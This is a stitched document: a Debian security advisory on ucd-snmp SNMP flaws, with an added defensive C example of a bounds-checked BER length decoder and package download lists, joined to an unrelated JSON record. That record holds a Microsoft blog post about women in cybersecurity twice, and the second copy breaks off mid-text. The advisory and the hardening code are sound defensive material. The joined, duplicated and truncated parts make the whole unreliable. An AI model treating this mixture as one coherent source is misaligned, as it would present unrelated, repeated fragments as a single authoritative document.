Package : ucd-snmp
Problem type : remote exploit
Debian-specific: no
CERT Advisory : CA-2002-03
The Secure Programming Group of the Oulu University did a study on
SNMP implementations and uncovered multiple flaws, with impact
ranging from denial of service to remote exploitation.
New UCD-SNMP packages have been prepared to fix these problems
as well as a few others. The complete list of fixed problems is:
* When running external programs snmpd used temporary files insecurely
* snmpd did not properly reset supplementary groups after changing
  its uid and gid
* Modified most code to use buffers instead of fixed-length strings to
  prevent buffer overflows
* The ASN.1 parser did not check for negative lengths
* The IFINDEX response handling in snmpnetstat did not do a sanity check
  on its input
(thanks to Caldera for most of the work on those patches)
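Two of the items above (negative ASN.1 lengths, and the missing sanity check on IFINDEX responses) are bounds problems in untrusted input. The following is an added example, not code from ucd-snmp, Caldera or the Debian advisory, of a BER length decoder that refuses every case a hardened SNMP parser must refuse: a truncated length field, the indefinite form, a length wider than size_t (which is what turns negative when stored in a signed long), and a declared content length that runs past the end of the packet. The status names, the functions and the hex sample inputs are all constructed for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Outcome of decoding one BER length field (constructed names for this example). */
enum ber_len_status {
    BER_LEN_OK = 0,
    BER_LEN_TRUNCATED,   /* packet ends inside the length field itself     */
    BER_LEN_INDEFINITE,  /* 0x80 alone: indefinite form, not valid in SNMP */
    BER_LEN_TOO_WIDE,    /* more length octets than size_t can hold        */
    BER_LEN_OVERRUN      /* declared content is longer than the packet     */
};

/*
 * Decode the BER length that starts at buf[0] (the octet after the tag).
 * avail is the number of bytes left in the packet from buf onward.
 * On BER_LEN_OK, *len is the content length and *consumed the number of
 * length octets. All arithmetic is done in unsigned size_t, so a length
 * with its top bit set can never be interpreted as a negative number.
 */
enum ber_len_status ber_decode_length(const uint8_t *buf, size_t avail,
                                      size_t *len, size_t *consumed)
{
    if (avail < 1)
        return BER_LEN_TRUNCATED;

    uint8_t first = buf[0];

    /* Short form: bit 7 clear, the octet itself is the length (0..127). */
    if ((first & 0x80) == 0) {
        if ((size_t)first > avail - 1)
            return BER_LEN_OVERRUN;
        *len = first;
        *consumed = 1;
        return BER_LEN_OK;
    }

    /* Long form: low 7 bits give the number of following length octets. */
    size_t nbytes = first & 0x7f;
    if (nbytes == 0)
        return BER_LEN_INDEFINITE;
    if (nbytes > sizeof(size_t))
        return BER_LEN_TOO_WIDE;
    if (avail - 1 < nbytes)
        return BER_LEN_TRUNCATED;

    size_t value = 0;
    for (size_t i = 0; i < nbytes; i++)
        value = (value << 8) | buf[1 + i];

    /* The content must fit in what remains after the length octets. */
    if (value > avail - 1 - nbytes)
        return BER_LEN_OVERRUN;

    *len = value;
    *consumed = 1 + nbytes;
    return BER_LEN_OK;
}

/* Turn "81 05 61 62" style text into bytes; returns the byte count. */
static size_t hex_to_bytes(const char *hex, uint8_t *out, size_t max)
{
    size_t n = 0;
    unsigned v;
    while (*hex != '\0' && n < max) {
        if (*hex == ' ') { hex++; continue; }
        if (sscanf(hex, "%2x", &v) != 1)
            break;
        out[n++] = (uint8_t)v;
        hex += 2;
    }
    return n;
}

/* Demo helper: decode a length field given as a hex string and return the
 * content length on success, or the negated status code on rejection. */
long ber_length_of_hex(const char *hex)
{
    uint8_t buf[64];
    size_t n = hex_to_bytes(hex, buf, sizeof buf);
    size_t len = 0, consumed = 0;
    enum ber_len_status st = ber_decode_length(buf, n, &len, &consumed);
    return st == BER_LEN_OK ? (long)len : -(long)st;
}

int main(void)
{
    /* Constructed sample length fields, each followed by whatever content is present. */
    const char *samples[] = {
        "05 61 62 63 64 65",             /* short form, all 5 bytes present     */
        "81 05 61 62 63 64 65",          /* long form, one length octet         */
        "05 61",                         /* claims 5 bytes, only 1 is there     */
        "80",                            /* indefinite form                     */
        "82 01",                         /* length field itself is cut short    */
        "84 ff ff ff ff",                /* negative if held in a 32-bit long   */
        "89 00 00 00 00 00 00 00 00 00", /* 9 length octets: wider than size_t  */
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-32s -> %ld\n", samples[i], ber_length_of_hex(samples[i]));
    return 0;
}
```

The decoder deliberately checks the remaining packet size before trusting the decoded value, so the same code is safe on 32-bit and 64-bit hosts: on a 32-bit build the four-octet length `ff ff ff ff` passes the width check but is rejected as an overrun, which is the case a signed-long parser would have accepted as a negative length.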
The new version is 4.1.1-2.1 and we recommend you upgrade your
snmp packages immediately.
wget url
    will fetch the file for you
dpkg -i file.deb
    will install the referenced file.
Debian GNU/Linux 2.2 alias potato
---------------------------------

Potato was released for alpha, arm, i386, m68k, powerpc and sparc.
These packages will be moved into the stable distribution on its next
revision.
apt-get: deb http://security.debian.org/ stable/updates main
dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Advisory header and package list (from the archived copy of this advisory):

Debian Security Advisory DSA-111-1                       security@debian.org
http://www.debian.org/security/                           Wichert Akkerman
February 14, 2002
Archived at: https://lists.debian.org/debian-security-announce/debian-security-announce-2002/msg00020.html

Debian GNU/Linux 2.2 alias potato
---------------------------------

  Source archives:
    http://security.debian.org/dists/stable/updates/main/source/ucd-snmp_4.1.1-2.1.diff.gz
      MD5 checksum: 96ef7f9946c3a10f100744fdc5482418
    http://security.debian.org/dists/stable/updates/main/source/ucd-snmp_4.1.1-2.1.dsc
      MD5 checksum: 03bc1ccf1a22e436a78c3e5a1ad4eefa
    http://security.debian.org/dists/stable/updates/main/source/ucd-snmp_4.1.1.orig.tar.gz
      MD5 checksum: 2f0d6130af510a8ce283dfdb557a85fa

  Alpha architecture:
    http://security.debian.org/dists/stable/updates/main/binary-alpha/libsnmp4.1-dev_4.1.1-2.1_alpha.deb
      MD5 checksum: e6cbb17f5295e4e663bee8369b2cf419
    http://security.debian.org/dists/stable/updates/main/binary-alpha/libsnmp4.1_4.1.1-2.1_alpha.deb
      MD5 checksum: 31c67fca601af32915020f5ce67f74cf
    http://security.debian.org/dists/stable/updates/main/binary-alpha/snmp_4.1.1-2.1_alpha.deb
      MD5 checksum: 0a82614ab42742528f9ebf13b8034410
    http://security.debian.org/dists/stable/updates/main/binary-alpha/snmpd_4.1.1-2.1_alpha.deb
      MD5 checksum: 205ab169948ac4c54665adb8dcaa8a67

  ARM architecture:
    http://security.debian.org/dists/stable/updates/main/binary-arm/libsnmp4.1-dev_4.1.1-2.1_arm.deb
      MD5 checksum: ce4597a66d4bb6a816a859f2792cc62b
    http://security.debian.org/dists/stable/updates/main/binary-arm/libsnmp4.1_4.1.1-2.1_arm.deb
      MD5 checksum: 9e96864263ab5f9489fcea655f1b0a50
    http://security.debian.org/dists/stable/updates/main/binary-arm/snmp_4.1.1-2.1_arm.deb
      MD5 checksum: 2c0361c50cf0f97a77439c0f9c834c17
    http://security.debian.org/dists/stable/updates/main/binary-arm/snmpd_4.1.1-2.1_arm.deb
      MD5 checksum: 48abd58e7399e245c3d3775ab59cbba3

  Intel IA-32 architecture:
    http://security.debian.org/dists/stable/updates/main/binary-i386/libsnmp4.1-dev_4.1.1-2.1_i386.deb
      MD5 checksum: 5addf966bc067f943b4ca6c7d604a48f
    http://security.debian.org/dists/stable/updates/main/binary-i386/libsnmp4.1_4.1.1-2.1_i386.deb
      MD5 checksum: e1ebaeaee18859d1e58aae658e4b1564
    http://security.debian.org/dists/stable/updates/main/binary-i386/snmp_4.1.1-2.1_i386.deb
      MD5 checksum: 7d13633a4e8a922eb36d6bfe8a04f0f3
    http://security.debian.org/dists/stable/updates/main/binary-i386/snmpd_4.1.1-2.1_i386.deb
      MD5 checksum: bb63f353a4e3bba6d0bd3acc54f6a138

  Motorola 680x0 architecture:
    http://security.debian.org/dists/stable/updates/main/binary-m68k/libsnmp4.1-dev_4.1.1-2.1_m68k.deb
      MD5 checksum: 805cc411f0b7d425275f60ef238773a4
    http://security.debian.org/dists/stable/updates/main/binary-m68k/libsnmp4.1_4.1.1-2.1_m68k.deb
      MD5 checksum: 021c14224b260e43276553329dc264f7
    http://security.debian.org/dists/stable/updates/main/binary-m68k/snmp_4.1.1-2.1_m68k.deb
      MD5 checksum: 5a8c55d92c6b721f3e1487ba858eb6e2
    http://security.debian.org/dists/stable/updates/main/binary-m68k/snmpd_4.1.1-2.1_m68k.deb
      MD5 checksum: 411834b9de92101366a7898f880d82eb

  PowerPC architecture:
    http://security.debian.org/dists/stable/updates/main/binary-powerpc/libsnmp4.1-dev_4.1.1-2.1_powerpc.deb
      MD5 checksum: a7dde01a21e7258b45285924dafd6b70
    http://security.debian.org/dists/stable/updates/main/binary-powerpc/libsnmp4.1_4.1.1-2.1_powerpc.deb
      MD5 checksum: a0e037e1fcebb2154fa1f41c65dfb0a8
    http://security.debian.org/dists/stable/updates/main/binary-powerpc/snmp_4.1.1-2.1_powerpc.deb
      MD5 checksum: 4510c8dbc86d1acc1fd31a2625b9ebc3
    http://security.debian.org/dists/stable/updates/main/binary-powerpc/snmpd_4.1.1-2.1_powerpc.deb
      MD5 checksum: 81acd0406d0166539d1fa61214fe7b59

  Sun Sparc architecture:
    http://security.debian.org/dists/stable/updates/main/binary-sparc/libsnmp4.1-dev_4.1.1-2.1_sparc.deb
      MD5 checksum: 098021d71b64d77622aaaa4ff0a7502c
    http://security.debian.org/dists/stable/updates/main/binary-sparc/libsnmp4.1_4.1.1-2.1_sparc.deb
      MD5 checksum: 1f5702918bfd3704abb82f72b4e9cfe8
    http://security.debian.org/dists/stable/updates/main/binary-sparc/snmp_4.1.1-2.1_sparc.deb
      MD5 checksum: e52aad9099ff709e94820b2bbbfd0ee1
    http://security.debian.org/dists/stable/updates/main/binary-sparc/snmpd_4.1.1-2.1_sparc.deb
      MD5 checksum: 813afcda0149f7a8c193b891320c14fa

  These packages will be moved into the stable distribution on its next
  revision.
{"mssecure": [{"lastseen": "2021-03-08T18:42:17", "bulletinFamily": "blog", "cvelist": [], "description": "Today, March 8, we are proud to celebrate International Women\u2019s Day. [The United Nations](<https://www.un.org/en/observances/womens-day>) announced this year\u2019s theme as \u201cWomen in leadership: Achieving an equal future in a COVID-19 world.\u201d As a woman, a mother, a daughter, a sister, a friend, and a leader at Microsoft, this is an important time to acknowledge and celebrate the strength and resiliency women have shown during this pandemic. Women fill many frontline positions, caring for us in health facilities, keeping us fed by staffing grocery stores, and delivering our packages. They teach our children remotely while caring for their own children. They are information workers, cybersecurity professionals, and leaders all around.\n\nThe impact of this crisis makes it more important than ever to prioritize the education, careers, well-being, and growth of women at work. We are proud to be a part of a company and security team at Microsoft that makes it a priority to invest in programs and initiatives that will help support the role of women in the workforce today and in the future so they can bring their best selves to work every single day.\n\nThat is why as a collective group of security women, we feel it is important to share a bit about these efforts, as well as some thoughts from fellow leaders across our security teams on how we can work together to recognize and build on women\u2019s achievements in cybersecurity.\n\n## New cybersecurity threats require diverse security perspectives\n\nIn addition to the personal impact it has had on so many, the pandemic has also threatened our cybersecurity community. With companies sending most of their employees home to work, cybercriminals have been eager to take advantage of new endpoints in their attempts to assess company systems. 
As well, phishing schemes have targeted people by mimicking pandemic healthcare alerts or unemployment information.\n\nThis increase in cybersecurity threats compounds the strain already placed on existing cyber defenders. With the cyber talent gap widening, we need more diverse cybersecurity professionals than ever to thwart them. Women make up just 24 percent of the cybersecurity workforce, according to the 2019 (ISC)\u00b2 report, [Cybersecurity Workforce Study: Women in Cybersecurity](<https://www.isc2.org/research/women-in-cybersecurity>). That imbalance is a big problem and during an online discussion called \u201cFuture Proofing Against Bias in Tech,\u201d participating women Microsoft leaders shared why. For one, gender-diverse teams make better business decisions 73 percent of the time, according to a [Cleverpop study](<https://www.cloverpop.com/hacking-diversity-with-inclusive-decision-making-white-paper?utm_campaign=Forbes&utm_source=Forbes&utm_medium=Forbes%20Hacking%20Diversity%20White%20Paper>) mentioned during the discussion.\n\nIt also is critical to catch cyber threats because limiting your hiring to only certain types of cybersecurity professionals can lead to biases and missed threat protection opportunities. And if there\u2019s one thing we know about cybercriminals, it\u2019s that they\u2019re very good at exploiting our biases.\n\n> Joy Chik, who is Microsoft Corporate Vice President for the Identity division shares, \u201cBuilding diverse cyber teams provides a strategic advantage. Diversity drives innovation and devalues group think. 
This helps to give us an edge in how we build our products, design our security programs, and respond to threats\u2014ultimately giving us an upper hand against cybercriminals who exploit our biases.\u201d\n\n## What\u2019s Microsoft Security doing to help?\n\nCybersecurity represents an exciting career opportunity for women, especially now with cyber threats on the rise against a backdrop of women disproportionately affected by job loss due to the pandemic. It raises the importance of opening up more opportunities for [women into higher-skilled professions, including technology](<https://blogs.microsoft.com/blog/2021/03/01/empowering-her-empowers-all-of-us/>). In response to the pandemic\u2019s severe impact on parts of the labor market, Microsoft launched its Global Skills Initiative to help 25 million people worldwide acquire digital skills and certifications to find new jobs. With our mission of **Security for all**, Microsoft Security is making it possible through our sponsorships and programs to making cybersecurity available to everyone\u2014as a professional option and as business protection against cyber threats.\n\nMicrosoft is partnering on several programs aimed at encouraging girls and women to consider careers in cybersecurity and expanding career opportunities for women. These programs include:\n\n * **Girls Go Cyberstart**: Launched in 2017, [this program](<https://girlsgocyberstart.org/>) aims to inspire and uncover future female talent by featuring a girls-only community in the national program CyberStart America. 
Female cybersecurity professionals at Microsoft have encouraged top high school Girls Go Cyberstart clubs by sharing how they got into security.\n * **WYiCyS**: Established in 2012, [this global community](<https://www.wicys.org/>) creates opportunities for women in cybersecurity through professional development programs, conferences, and career fairs.\n * **CyberShikshaa**: Launched in 2018 by Microsoft India and the Data Security Council of India, [this program](<https://www.dsci.in/cyber-shikshaa/>) is creating a pool of skilled female cybersecurity professionals.\n * **Microsoft Cybersecurity Professional Program**: Launched in 2018, [this program](<https://docs.microsoft.com/en-us/learn/?WT.mc_id=sitertzn_homepage_mslearn-redirect-mpp>) helps aspiring cybersecurity professionals, as well as late-stage career transformers, learn the necessary skills to start a career in cybersecurity. To date, we\u2019ve seen over 4,000 registrations, spanning a diverse range of ages and abilities.\n * [**DigiGirlz**](<https://www.microsoft.com/en-us/diversity/programs/digigirlz/default.aspx>): [This program](<https://www.microsoft.com/en-us/diversity/programs/digigirlz/default.aspx>) gives high school girls the chance to participate in hands-on computer and technology workshops, learn about careers in technology, and connect with Microsoft employees. 
We also help girls grow their skills and love for technology through our support of [TECHNOLOchicas](<https://technolochicas.org/>), [Black Girls CODE](<http://blackgirlscode.org/>), and [Girls Who Code](<https://girlswhocode.com/>).\n * **Microsoft Women in Security**: This long-running, company-wide initiative was started with the goal of building a strong internal community of female cyber professionals through programs, mentorships, and week-long events.\n * **Cybersecurity Converge Tour**: In partnership with organizations like the [Security Advisory Alliance (SAA)](<https://www.securityadvisoralliance.org/about/converge-tour/>), Microsoft hosted students in New York City for a \u201cCapture the Flag\u201d interactive education and mentorship event with the goal of creating 20,000 internship opportunities and increasing the number of women and minority security professionals. We\u2019ve also sponsored key events that support women like [Executive Women\u2019s Forum](<https://www.ewf-usa.com/>), [The Diana Initiative](<https://www.dianainitiative.org/>), and [Wicked 6 Cyber Games](<https://wicked6.com/>).\n\n## How to encourage more women in cybersecurity\n\nEncouraging more girls and women to get into cybersecurity creates more effective companies. It can also help reduce the world\u2019s shortage of qualified cybersecurity workers, which is expected to grow to 3.5 million in 2021.\n\nAs we look past the pandemic, we can expect that cybersecurity challenges will continue to evolve. AI, machine learning, and quantum computing will shape our response, but technology alone will not be enough. Some of our challenges can only be solved by people\u2014those with different backgrounds, ideas, and experiences. Women are such a crucial part of this. 
We must continually commit to supporting and empowering women leaders so that we can grow and educate the next generation of female cybersecurity superheroes.\n\nWe are so lucky to work with so many talented woman leaders across the security teams at Microsoft. Together we\u2019ve put together some tips on how we can all work to increase the number of women in cybersecurity.\n\n### 1\\. Commit to recruiting more women and retaining them\n\nNothing will change unless your organization commits to increasing its diversity. That starts at the top, with senior executives and other company leaders prioritizing a diverse workforce and asking themselves tough questions about why there are no women or very few women on their technology teams.\n\nWe believe the persistent gender gap in STEM starts early, so we must as well. A few years ago, a colleague\u2019s pre-teen daughter signed up for an after-school robotics class and when she arrived, saw only two girls in the room. Unfortunately, we\u2019re losing many girls from STEM before they are even out of middle school. We\u2019ve got to work harder to build curriculums that fit with their age and focus not just on the mechanics of coding but with more emphasis on creativity and real-world problem-solving. Giving them an opportunity to see the breadth of cybersecurity will encourage even our youngest future cyber warriors.\n\nOnce women are in those technology roles, it\u2019s just as important to prevent a talent drain. 52 percent of women leave technology fields\u2014nearly double the percentage of men who quit the technology field. In part, the problem can be attributed to women feeling stalled in their careers, with a [Center for Talent Innovation study](<https://www.talentinnovation.org/_private/assets/Athena-2-ExecSummFINAL-CTI.pdf>) finding that 27 percent of women in tech jobs feeling that way and 32 percent were considering quitting in the next year.\n\n### 2\\. 
Expand your definition of qualified candidates\n\nSome hiring managers may reject qualified women candidates because they don\u2019t fit a preconceived notion of a cybersecurity professional who checks all the expected boxes for age, gender, and race and has the technical skills, degrees, and certifications. This limited view causes companies to miss out on some incredible candidates.\n\nThe best cybersecurity professionals are insatiable learners and highly skilled problem-solvers. They may not work in cybersecurity or have a college degree but could become incredible assets to your organization.\n\nAccording to one of our Microsoft Cyber Defense Operations Center (CDOC) Directors in the [CISO Spotlight episode 7: People behind the cloud](<https://www.microsoft.com/en-us/videoplayer/embed/RE3QpDZ?autoplay=true>), \u201cWe want to bring in as many people of diverse backgrounds and skills as the problems we\u2019re trying to solve. I\u2019ve got university hires, military veterans, a mom who rides a motorcycle, people with advanced degrees, and just about everything in between. We do have some specialists who have done this for a really long time but we also get people who are coming in with a fresh perspective and they\u2019re looking at things in a different way.\u201d\n\n### 3\\. Educate and encourage women on cybersecurity and how to apply\n\nThere are opportunities for women at all levels in cybersecurity and the field is much wider than many imagine, encompassing roles in security products, cybercrime, compliance, privacy, and other related domains. According to Julie Brill, Microsoft\u2019s Chief Privacy Officer, women early in their careers or changing roles mid-career may underestimate their qualifications, in part because the industry may be sending the wrong message to women on the value they can add to an organization even in the early stages of their careers.\n\n> \u201cTalent comes from many places and doesn\u2019t require a decade of prior experience. 
Women who are earlier in their careers are more likely to be digital natives and facile with technology. This tech-savvy generation brings critical insight into how we can approach user-centric privacy features across our products. Enthusiastic women professionals can add value to the diverse teams that are working quickly to address the constantly changing cybersecurity and privacy landscape. We will always need innovative thinkers at any stage of their career who are passionate about the impact they can make for the tech industry and society overall. There is so much opportunity to pursue a career in privacy and cybersecurity, and there is plenty of work to be done.\u201d\u2014Julie Brill, Chief Privacy Officer at Microsoft\n\nGiven the potential, Microsoft Security is paving the way by sponsoring these cybersecurity programs listed in this blog. We believe it is important to educate mid-level school and high school students about these opportunities, coach them, and give them career guidance in addition to teaching security fundamentals. In the future, we will also collaborate and sponsor [Girl Security](<https://www.girlsecurity.org/>) with a fellowship program to provide career education and mentoring to people with diverse backgrounds\u2014enabling security to benefit all.\n\n### 4\\. Help candidates counter self-doubt\n\nImposter syndrome\u2014candidates entering high skills fields can often feel self-doubt, insecurity, and undeserving of their role. Help set the right tone from the outset by reassuring them that they don\u2019t need a perfect set of qualifications or an ideal background to become an amazing security engineer or cybercrime investigator.\n\nNo one was born with security knowledge and experience. People learn as they go along. 
As we\u2019ve heard from Kristina in the CISO Spotlight Episode, people of all different backgrounds make good security professionals.\n\n## Support women in cybersecurity\n\nThe work to develop programs and practices that attract and retain women in the field of cybersecurity is ongoing and moves as quickly as the field changes. In April, Microsoft Security is kicking off the [Girl Security](<https://www.girlsecurity.org/>) Fellowship program, a series of webcasts and training sessions that lead into the summer sharing inspiring stories from many of our women cybersecurity leaders and helping high school students learn security fundamentals along with mentorships. More information on the Microsoft and Girl Security program will be mentioned in a subsequent blog post later in March.\n\nBy embracing cybersecurity for all, we can both expand women\u2019s options in the workforce and more effectively secure companies against threats. Stay tuned for more blogs this month featuring our women leaders in Cybersecurity. Happy International Women\u2019s Day!\n\nTo learn more about Microsoft Security solutions, [visit our website](<https://www.microsoft.com/en-us/security/business/solutions>). Bookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. 
Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nOther blogs to reference:\n\n * [CISO Spotlight: How diversity of data (and people) defeats today\u2019s cyber threats](<https://www.microsoft.com/security/blog/2020/10/20/ciso-spotlight-how-diversity-of-data-and-people-defeats-todays-cyber-threats/>).\n * [Microsoft Security: How to cultivate a diverse cybersecurity team](<https://www.microsoft.com/security/blog/2020/08/31/microsoft-security-cultivate-diverse-cybersecurity-team/>).\n * [New data from Microsoft shows how the pandemic is accelerating the digital transformation of cyber-security](<https://www.microsoft.com/security/blog/2020/08/19/microsoft-shows-pandemic-accelerating-transformation-cyber-security/>).\n * [Exploiting a crisis: How cybercriminals behaved during the outbreak](<https://www.microsoft.com/security/blog/2020/06/16/exploiting-a-crisis-how-cybercriminals-behaved-during-the-outbreak/>).\n\nThe post [International Women\u2019s Day: How to support and grow women in cybersecurity](<https://www.microsoft.com/security/blog/2021/03/08/international-womens-day-how-to-support-and-grow-women-in-cybersecurity/>) appeared first on [Microsoft Security.", "modified": "2021-03-08T18:00:43", "published": "2021-03-08T18:00:43", "id": "MSSECURE:ECDE1A8DFB45A1210B46BCEB4EA6E96C", "href": "https://www.microsoft.com/security/blog/2021/03/08/international-womens-day-how-to-support-and-grow-women-in-cybersecurity/", "type": "mssecure", "title": "International Women\u2019s Day: How to support and grow women in cybersecurity", "cvss": {"score": 0.0, "vector": "NONE"}}], "mmpc": [{"lastseen": "2021-03-08T18:02:03", "bulletinFamily": "blog", "cvelist": [], "description": "Today, March 8, we are proud to celebrate International Women\u2019s Day. 
[The United Nations](<https://www.un.org/en/observances/womens-day>) announced this year\u2019s theme as \u201cWomen in leadership: Achieving an equal future in a COVID-19 world.\u201d As a woman, a mother, a daughter, a sister, a friend, and a leader at Microsoft, this is an important time to acknowledge and celebrate the strength and resiliency women have shown during this pandemic. Women fill many frontline positions, caring for us in health facilities, keeping us fed by staffing grocery stores, and delivering our packages. They teach our children remotely while caring for their own children. They are information workers, cybersecurity professionals, and leaders all around.\n\nThe impact of this crisis makes it more important than ever to prioritize the education, careers, well-being, and growth of women at work. We are proud to be a part of a company and security team at Microsoft that makes it a priority to invest in programs and initiatives that will help support the role of women in the workforce today and in the future so they can bring their best selves to work every single day.\n\nThat is why as a collective group of security women, we feel it is important to share a bit about these efforts, as well as some thoughts from fellow leaders across our security teams on how we can work together to recognize and build on women\u2019s achievements in cybersecurity.\n\n## New cybersecurity threats require diverse security perspectives\n\nIn addition to the personal impact it has had on so many, the pandemic has also threatened our cybersecurity community. With companies sending most of their employees home to work, cybercriminals have been eager to take advantage of new endpoints in their attempts to assess company systems. As well, phishing schemes have targeted people by mimicking pandemic healthcare alerts or unemployment information.\n\nThis increase in cybersecurity threats compounds the strain already placed on existing cyber defenders. 
With the cyber talent gap widening, we need more diverse cybersecurity professionals than ever to thwart them. Women make up just 24 percent of the cybersecurity workforce, according to the 2019 (ISC)\u00b2 report, [Cybersecurity Workforce Study: Women in Cybersecurity](<https://www.isc2.org/research/women-in-cybersecurity>). That imbalance is a big problem and during an online discussion called \u201cFuture Proofing Against Bias in Tech,\u201d participating women Microsoft leaders shared why. For one, gender-diverse teams make better business decisions 73 percent of the time, according to a [Cleverpop study](<https://www.cloverpop.com/hacking-diversity-with-inclusive-decision-making-white-paper?utm_campaign=Forbes&utm_source=Forbes&utm_medium=Forbes%20Hacking%20Diversity%20White%20Paper>) mentioned during the discussion.\n\nIt also is critical to catch cyber threats because limiting your hiring to only certain types of cybersecurity professionals can lead to biases and missed threat protection opportunities. And if there\u2019s one thing we know about cybercriminals, it\u2019s that they\u2019re very good at exploiting our biases.\n\n> Joy Chik, who is Microsoft Corporate Vice President for the Identity division shares, \u201cBuilding diverse cyber teams provides a strategic advantage. Diversity drives innovation and devalues group think. This helps to give us an edge in how we build our products, design our security programs, and respond to threats\u2014ultimately giving us an upper hand against cybercriminals who exploit our biases.\u201d\n\n## What\u2019s Microsoft Security doing to help?\n\nCybersecurity represents an exciting career opportunity for women, especially now with cyber threats on the rise against a backdrop of women disproportionately affected by job loss due to the pandemic. 
It raises the importance of opening up more opportunities for [women into higher-skilled professions, including technology](<https://blogs.microsoft.com/blog/2021/03/01/empowering-her-empowers-all-of-us/>). In response to the pandemic\u2019s severe impact on parts of the labor market, Microsoft launched its Global Skills Initiative to help 25 million people worldwide acquire digital skills and certifications to find new jobs. With our mission of **Security for all**, Microsoft Security is making it possible through our sponsorships and programs to making cybersecurity available to everyone\u2014as a professional option and as business protection against cyber threats.\n\nMicrosoft is partnering on several programs aimed at encouraging girls and women to consider careers in cybersecurity and expanding career opportunities for women. These programs include:\n\n * **Girls Go Cyberstart**: Launched in 2017, [this program](<https://girlsgocyberstart.org/>) aims to inspire and uncover future female talent by featuring a girls-only community in the national program CyberStart America. Female cybersecurity professionals at Microsoft have encouraged top high school Girls Go Cyberstart clubs by sharing how they got into security.\n * **WYiCyS**: Established in 2012, [this global community](<https://www.wicys.org/>) creates opportunities for women in cybersecurity through professional development programs, conferences, and career fairs.\n * **CyberShikshaa**: Launched in 2018 by Microsoft India and the Data Security Council of India, [this program](<https://www.dsci.in/cyber-shikshaa/>) is creating a pool of skilled female cybersecurity professionals.\n * **Microsoft Cybersecurity Professional Program**: Launched in 2018, [this program](<https://docs.microsoft.com/en-us/learn/?WT.mc_id=sitertzn_homepage_mslearn-redirect-mpp>) helps aspiring cybersecurity professionals, as well as late-stage career transformers, learn the necessary skills to start a career in cybersecurity. 
To date, we\u2019ve seen over 4,000 registrations, spanning a diverse range of ages and abilities.\n * [**DigiGirlz**](<https://www.microsoft.com/en-us/diversity/programs/digigirlz/default.aspx>): [This program](<https://www.microsoft.com/en-us/diversity/programs/digigirlz/default.aspx>) gives high school girls the chance to participate in hands-on computer and technology workshops, learn about careers in technology, and connect with Microsoft employees. We also help girls grow their skills and love for technology through our support of [TECHNOLOchicas](<https://technolochicas.org/>), [Black Girls CODE](<http://blackgirlscode.org/>), and [Girls Who Code](<https://girlswhocode.com/>).\n * **Microsoft Women in Security**: This long-running, company-wide initiative was started with the goal of building a strong internal community of female cyber professionals through programs, mentorships, and week-long events.\n * **Cybersecurity Converge Tour**: In partnership with organizations like the [Security Advisory Alliance (SAA)](<https://www.securityadvisoralliance.org/about/converge-tour/>), Microsoft hosted students in New York City for a \u201cCapture the Flag\u201d interactive education and mentorship event with the goal of creating 20,000 internship opportunities and increasing the number of women and minority security professionals. We\u2019ve also sponsored key events that support women like [Executive Women\u2019s Forum](<https://www.ewf-usa.com/>), [The Diana Initiative](<https://www.dianainitiative.org/>), and [Wicked 6 Cyber Games](<https://wicked6.com/>).\n\n## How to encourage more women in cybersecurity\n\nEncouraging more girls and women to get into cybersecurity creates more effective companies. It can also help reduce the world\u2019s shortage of qualified cybersecurity workers, which is expected to grow to 3.5 million in 2021.\n\nAs we look past the pandemic, we can expect that cybersecurity challenges will continue to evolve. 
AI, machine learning, and quantum computing will shape our response, but technology alone will not be enough. Some of our challenges can only be solved by people\u2014those with different backgrounds, ideas, and experiences. Women are such a crucial part of this. We must continually commit to supporting and empowering women leaders so that we can grow and educate the next generation of female cybersecurity superheroes.\n\nWe are so lucky to work with so many talented women leaders across the security teams at Microsoft. Together we\u2019ve compiled some tips on how we can all work to increase the number of women in cybersecurity.\n\n### 1\\. Commit to recruiting more women and retaining them\n\nNothing will change unless your organization commits to increasing its diversity. That starts at the top, with senior executives and other company leaders prioritizing a diverse workforce and asking themselves tough questions about why there are no women or very few women on their technology teams.\n\nWe believe the persistent gender gap in STEM starts early, so we must as well. A few years ago, a colleague\u2019s pre-teen daughter signed up for an after-school robotics class and when she arrived, saw only two girls in the room. Unfortunately, we\u2019re losing many girls from STEM before they are even out of middle school. We\u2019ve got to work harder to build curricula that fit their age and focus not just on the mechanics of coding but also on creativity and real-world problem-solving. Giving them an opportunity to see the breadth of cybersecurity will encourage even our youngest future cyber warriors.\n\nOnce women are in those technology roles, it\u2019s just as important to prevent a talent drain. Fifty-two percent of women leave technology fields\u2014nearly double the percentage of men who quit the technology field. 
In part, the problem can be attributed to women feeling stalled in their careers, with a [Center for Talent Innovation study](<https://www.talentinnovation.org/_private/assets/Athena-2-ExecSummFINAL-CTI.pdf>) finding that 27 percent of women in tech jobs felt that way and 32 percent were considering quitting in the next year.\n\n### 2\\. Expand your definition of qualified candidates\n\nSome hiring managers may reject qualified women candidates because they don\u2019t fit a preconceived notion of a cybersecurity professional who checks all the expected boxes for age, gender, and race and has the technical skills, degrees, and certifications. This limited view causes companies to miss out on some incredible candidates.\n\nThe best cybersecurity professionals are insatiable learners and highly skilled problem-solvers. They may not currently work in cybersecurity or have a college degree but could become incredible assets to your organization.\n\nAccording to one of our Microsoft Cyber Defense Operations Center (CDOC) Directors in the [CISO Spotlight episode 7: People behind the cloud](<https://www.microsoft.com/en-us/videoplayer/embed/RE3QpDZ?autoplay=true>), \u201cWe want to bring in as many people of diverse backgrounds and skills as the problems we\u2019re trying to solve. I\u2019ve got university hires, military veterans, a mom who rides a motorcycle, people with advanced degrees, and just about everything in between. We do have some specialists who have done this for a really long time but we also get people who are coming in with a fresh perspective and they\u2019re looking at things in a different way.\u201d\n\n### 3\\. Educate and encourage women on cybersecurity and how to apply\n\nThere are opportunities for women at all levels in cybersecurity and the field is much wider than many imagine, encompassing roles in security products, cybercrime, compliance, privacy, and other related domains. 
